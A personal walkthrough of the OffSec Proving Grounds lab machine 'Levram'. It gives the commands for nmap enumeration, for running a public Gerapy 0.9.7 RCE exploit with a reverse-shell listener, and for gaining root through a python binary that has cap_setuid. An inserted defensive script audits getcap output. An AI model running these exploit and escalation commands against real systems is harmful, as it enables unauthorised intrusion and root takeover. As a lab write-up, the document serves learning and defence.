Proving Grounds: Levram

Machine Walkthrough


OffSec Proving Grounds Walkthrough: Levram

Table of Contents

  1. Introduction
  2. Information Gathering
  3. Exploitation
  4. Conclusion

Introduction

  • Machine Name: Levram
  • IP: 192.168.213.24
  • Points: 10
  • Difficulty Level: Easy
  • Operating System: Linux
  • Objective: This walkthrough details the process of identifying and exploiting vulnerabilities in the Levram system to achieve root access. The goal is to gain both user and root flags.

We are starting the journey with an easy box called “Levram”. I am going to tackle this in 4 steps:

1) Information Gathering
2) Exploitation
3) Post-Exploitation

and at the end I’ll give you my conclusion of the box :)

Let’s begin!

Information Gathering

Initial Enumeration

Tool Used: Nmap

I begin by scanning the target machine to identify any open ports. I know this box is easy, so I’m starting with the bare basics as I don’t think there’s too much to it.

nmap -p- -sV 192.168.213.24

Nmap scan report for 192.168.213.24
Host is up (0.035s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
8000/tcp open http-alt WSGIServer/0.2 CPython/3.10.6

From this initial scan I can see that there’s a webpage being served at 192.168.213.24:8000. Going to that page, I see:

[Screenshot: website]

It looks like I will have to guess the username/password, but first things first: I “inspect” the page for any comments or anything that can point me to a username or password. This led me nowhere…. but I do have the word “gerapy”.

Tool Used: searchsploit

Using searchsploit I search for “gerapy”. This search returned a vulnerability in Gerapy 0.9.7 that leads to remote code execution. I don’t know what version of Gerapy I am looking at, at least, not yet.

[Screenshot: searchsploit]

Next in line is to inspect the code for that vulnerability. I used the flag below to get the path of the file, then copied the file into another directory for use:

searchsploit -p 50640

[Screenshot: searchsploit2]

I went ahead and loaded the code to inspect it and see what it does, and right in front of my nose I see “username/password”:

[Screenshot: up]

Well, that made things a lot simpler… I went ahead and logged in to the website with those credentials to see what it was.

[Screenshot: website1]

At the bottom of the page I can see the Gerapy version, 0.9.7! woot! That means the exploit will work! Let’s continue reading the exploit to see what else I can find out…. In lines 80 and 81 I can see that I need to have a project ID. Right now the website doesn’t have any projects, so the code will most likely fail if I run it.

[Screenshot: quit]

I am currently logged in as the admin, so let’s add a project and see what happens.

[Screenshot: project]

It looks like I have the option to upload, close and create. I will go with create to begin with to see what happens when the code is executed, and I’ll adjust my approach if I get a failure.

[Screenshot: project1]

OK, so we got everything ready to try the exploit! Let’s goooo!

Exploitation

Gaining Initial Access

Running the python script with all the required flags and a netcat listener ready to go gave me the initial foothold on the machine.

  • Exploit Used: CVE-2021-43857
  • Command:
    python3 exploit.py -t 192.168.213.24 -p 8000 -L 192.168.45.194 -P 1234
  • Outcome: Gained access as ‘app’

[Screenshot: foothold]

First flag was found!

[Screenshot: local_proof]

Privilege Escalation

The purpose of this step is to escalate from the initial access level to root or admin.

  • Tool Used: Manual methods
  • Vulnerability Found: python3 with the cap_setuid capability set!
  • Exploit Method:
    /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  • Outcome: Root access obtained.

I looked around in the PC for a bit but couldn’t find anything useful, and for a bit I was stuck :/
Then I went back to my checklist. DUH! (I used this site to populate some of the items in my checklist: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)

So I started by scanning the file system for files with capabilities using getcap -r /. The -r flag tells getcap to search recursively, and / indicates that we want to search the whole system. I also don’t want to see all the errors that will come up, so I added 2>/dev/null, which yeets the command’s error output into a black hole.

  • Command:
    getcap -r / 2>/dev/null

[Screenshot: getcap]

From that list I can see python3, and that it has cap_setuid set! Soooo, let’s try to break out of the shell using:

  • Command:
    ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
  • I edited it to reflect the path of the binary:
    /usr/bin/python3.10 -c 'import os; os.setuid(0); os.system("/bin/sh")'
  • This command is used as a backdoor to maintain privileged access by manipulating its own process UID (https://gtfobins.github.io/gtfobins/python/).

It worked! I navigated to “root” and was able to get the final flag “proof.txt”
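From the defender’s side, the same getcap listing is the thing to audit before an attacker reads it. The script below is an added example, not code from the post: it parses getcap output (both libcap output styles) and flags files whose capabilities should be removed or reviewed, with a constructed sample listing and a severity rule I chose for this audit.

```python
import re

# Capabilities that let a process become root or read/alter anything (list constructed for this audit).
DANGEROUS_CAPS = {
    "cap_setuid", "cap_setgid", "cap_sys_admin", "cap_sys_ptrace", "cap_sys_module",
    "cap_dac_override", "cap_dac_read_search", "cap_chown", "cap_fowner",
}
# General-purpose interpreters: any capability on these runs whatever code the caller supplies.
INTERPRETER_RE = re.compile(r"/(python|perl|ruby|php|node)[\d.]*$")
CLAUSE_RE = re.compile(r"([\w,]+)[=+](\w*)")   # "cap_a,cap_b=ep" or older "cap_a+ep"

# Constructed sample of `getcap -r / 2>/dev/null` output in both libcap styles, not the post's real listing.
SAMPLE_GETCAP = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.10 cap_setuid=ep
/usr/bin/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
/usr/bin/tcpdump cap_net_admin,cap_net_raw=eip
"""

def parse_getcap_line(line):
    """Return (path, {cap_name: flags}) for one getcap line, or None if blank; assumes no spaces in path."""
    line = line.strip()
    if not line:
        return None
    path, _, spec = line.partition(" ")
    caps = {}
    for clause in spec.lstrip("= ").split():
        m = CLAUSE_RE.fullmatch(clause)
        if m:
            for name in m.group(1).split(","):
                caps[name] = m.group(2)
    return path, caps

def audit(getcap_output):
    """Return [(path, severity, caps)] for files that need review, highest risk first."""
    order = {"critical": 0, "high": 1, "medium": 2}
    findings = []
    for line in getcap_output.splitlines():
        parsed = parse_getcap_line(line)
        if not parsed:
            continue
        path, caps = parsed
        # 'p' (permitted) already matters: the program can raise it into its effective set itself.
        risky = sorted(c for c, f in caps.items() if c in DANGEROUS_CAPS and "p" in f)
        interp = bool(INTERPRETER_RE.search(path))
        if risky or (interp and caps):
            severity = "critical" if risky and interp else "high" if risky else "medium"
            findings.append((path, severity, risky or sorted(caps)))
    return sorted(findings, key=lambda f: order[f[1]])
```

On the sample listing only python3.10 is reported (critical: a dangerous capability on an interpreter), which is exactly the finding that hands over root on this box; the fix is to drop the capability with setcap -r on that binary.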

[Screenshot: root]

Done!

Conclusion

  • Summary: This walkthrough covered the steps from initial enumeration to privilege escalation in the Levram box from proving grounds.
  • Reflection: I think this was a very good box due to the complexity of the privilege escalation; overall I liked it! Rating: 4/10.

This post is licensed under CC BY 4.0 by the author.